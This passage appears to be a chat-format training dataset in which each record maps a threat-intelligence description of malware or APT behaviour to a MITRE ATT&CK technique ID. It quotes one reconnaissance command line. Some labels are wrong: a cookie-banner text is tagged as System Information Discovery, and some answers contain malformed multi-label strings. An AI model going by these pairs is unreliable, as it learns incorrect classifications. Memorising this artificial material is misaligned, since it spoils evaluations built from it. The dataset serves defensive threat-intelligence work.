processes" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "actors spawned shells on remote systems on a victim network to execute commands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can use a variety of API calls to execute shellcode." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims." }, { "role": "assistant", "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy PSCP (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network’s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router" }, { "role": "assistant", "content": "T1021.004 - Remote Services: SSH" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can send \"consent phishing\" emails containing malicious links designed to steal users’ access tokens." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ABK has the ability to inject shellcode into svchost.exe." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pandora can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first plist, ~/Library/LaunchAgents/com.safarii.extension.plist, does not use a StartInterval value like the Chrome variant, but instead uses RunAtLoad. The RunAtLoad parameter is executed when the user logs into their computer. Note that the plist file does not use the correct spelling of Safari. " }, { "role": "assistant", "content": "T1647 - Plist File Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer', 'T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used WinRM via PowerShell to execute command and payloads on remote hosts." }, { "role": "assistant", "content": "T1021.006 - Remote Services: Windows Remote Management" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN10 has used Meterpreter to enumerate users on remote systems." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has communicated with C2 through files uploaded to and downloaded from DropBox." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has been known to remove indicators of compromise from tools." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes." }, { "role": "assistant", "content": "T1497.002 - User Activity Based Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITTER has obtained tools such as PuTTY for use in their operations." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has downloaded additional files and programs from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors copied files to company web servers and subsequently downloaded them." }, { "role": "assistant", "content": "T1074.002 - Remote Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "downloads encoded payloads and decodes them on the victim." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sliver can encrypt strings at compile time." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RCSession can use WinSock API for communication including \"WSASend\" and \"WSARecv\"." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLACKCOFFEE has the capability to enumerate files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound malware has used VBS scripts for execution." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can gather a process list from the victim." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRat's loader has been packed with the compressed ShimRat core DLL and the legitimate DLL for it to hijack." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper has created the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\" and sets the value to establish persistence." }, { "role": "assistant", "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "establishes persistence by creating a shortcut in the Windows startup folder to run a script each time the user logs in." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Spora ransomware, which began circulating in January of this year, is a ransomware noted for its sophistication, including top-notch customer support to victims, and was likely created by professional malicious actors." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf uses HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. According to Group-IB researchers, APT41 usually parks their domains for some time at 127.0.0.1 after their campaigns are over. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry. The contents of the file \"install.bat\" from APT41's This is Not a Test campaign" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Now the virtual environment is prepared, the install.bat command goes through a list of process names and terminates these processes so any files they have open are unlocked and become accessible for encryption. This list of 50 entries consists of mainly line-of-business applications, database, remote management and backup applications and is stored in a text file. Another text file contains services names. These are tailored to the victim organization’s network environment, including process and service names belonging to endpoint protection software" }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. In this sample, the threat actors' C2 server was the domain msdn[.]cloud" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrackMapExec can brute force passwords for a specified user on a single target system or across an entire network." }, { "role": "assistant", "content": "T1110.001 - Brute Force: Password Guessing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT has added persistence via the Registry key \"HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\\" and dropped a shortcut in \"%STARTUP%\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection." }, { "role": "assistant", "content": "T1027.008 - Stripped Payloads" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "But Ryuk isn’t new to us… we’ve been tracking it for years. More important than just looking at Ryuk ransomware itself, though, is looking at the operators behind it and their tactics, techniques, and procedures (TTPs)—especially those used before they encrypt any data. The operators of Ryuk ransomware are known by different names in the community, including “WIZARD SPIDER,” “UNC1878,” and “Team9. The malware they use has included TrickBot, Anchor, Bazar, Ryuk, and others" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation', 'T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SharpStage can use WMI for execution." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used WMI for persistence." }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SYNful Knock is malware that is inserted into a network device by patching the operating system image." }, { "role": "assistant", "content": "T1601.001 - Patch System Image" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PsExec can leverage Windows services to escalate privileges from administrator to SYSTEM with the \"-s\" argument." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The payload sends system information about the infected computer to the C&C server and downloads additional tools." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has abused the \"KernelCallbackTable\" to hijack process control flow and execute shellcode." }, { "role": "assistant", "content": "T1574.013 - KernelCallbackTable" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An APT28 macro uses the command \"certutil -decode\" to decode contents of a .txt file storing the base64 encoded payload." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOTHFULMEDIA has hashed a string containing system information prior to exfiltration via POST requests." }, { "role": "assistant", "content": "T1001 - Data Obfuscation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Forfiles can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has conducted internal spearphishing within the victim's environment for lateral movement." }, { "role": "assistant", "content": "T1534 - Internal Spearphishing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gather all network configuration information and record to a file on disk in a folder created by the implant using the command: cmd.exe /c ipconfig/all >>\"%s\" & arp -a >>\"%s\" where %s = <file_path" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Torisma can send victim data to an actor-controlled C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor can install itself as a cron job." }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM can capture screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mis-Type network traffic can communicate over a raw socket." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fifteen minutes after domain enumeration, we observed successful lateral movement to two endpoints on the network. Ten minutes after lateral movement, a PowerShell Cobalt Strike loader executed as a service on a server. Even though the execution was not successful, the threat actors kept trying, a total of eight times, until it finally worked. Windows Defender real-time monitoring was then disabled, the LSASS.exe process was dumped using SysInternals ProcDump, and privilege was escalated to “SYSTEM” using named pipe impersonation. " }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution', 'T1068 - Exploitation for Privilege Escalation', 'T1546.013 - Event Triggered Execution: PowerShell Profile" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Blue Mockingbird has used Windows Scheduled Tasks to establish persistence on local and remote hosts." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses ipconfig /all and route PRINT to identify network adapter and interface information." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used WMI event filters and consumers to establish persistence." }, { "role": "assistant", "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can schedule tasks via the Windows COM API to maintain persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If running in a Windows environment, Kazuar saves a DLL to disk that is injected into the explorer.exe process to execute the payload. Kazuar can also be configured to inject and execute within specific processes." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UBoatRAT can start a command shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Calisto has the capability to upload and download files to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleJeus has created a scheduled SYSTEM task that runs when a user logs in." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWiper has the ability to deploy through an infected system's default domain policy." }, { "role": "assistant", "content": "T1484.001 - Domain Policy Modification: Group Policy Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEMP.Veles has used scheduled task XML triggers." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has searched the compromised system for banking applications." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additionally malware reports itself to its hardcoded command and control servers and established a backdoor connection, so the attacker may have a permanent remote connection" }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "119 readFiles Obtains file information on a file or a folder, and supports a “*” wildcard and recursive file list" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FatDuke can secure delete its DLL." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When the newer service variant of BitPaymer is run, it first determines if it is being executed from an alternate data stream. If it is not executed from an alternate data stream, the malware creates a file in the %APPDATA% folder with a random file name between three and eight characters long, containing uppercase and lowercase letters as well as numbers. It then copies itself to the alternate data stream :bin of the newly created file and creates a new process from the stream" }, { "role": "assistant", "content": "T1564.004 - Hide Artifacts: NTFS File Attributes" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar can install itself as a new service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution in a vulnerable environment, the PowerShell based payload takes over" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PHOREAL is capable of creating reverse shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "spearphished victims via Facebook and Whatsapp." }, { "role": "assistant", "content": "T1566.003 - Spearphishing via Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Like the function name says Invoke-ReflectivePEInjection loads an portable executable (PE) file or DLL into the current or remote process memory and executes this file in memory." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Moses Staff has used batch scripts that can enable SMB on a compromised host." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of enumerating and making modifications to an infected system's Registry." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives" }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT has used Zlib to compress C2 communications data before encrypting it." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use Windows Authentication Packages for persistence." }, { "role": "assistant", "content": "T1547.002 - Authentication Package" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Doki has downloaded scripts from C2." }, { "role": "assistant", "content": "T1105 - Ingress 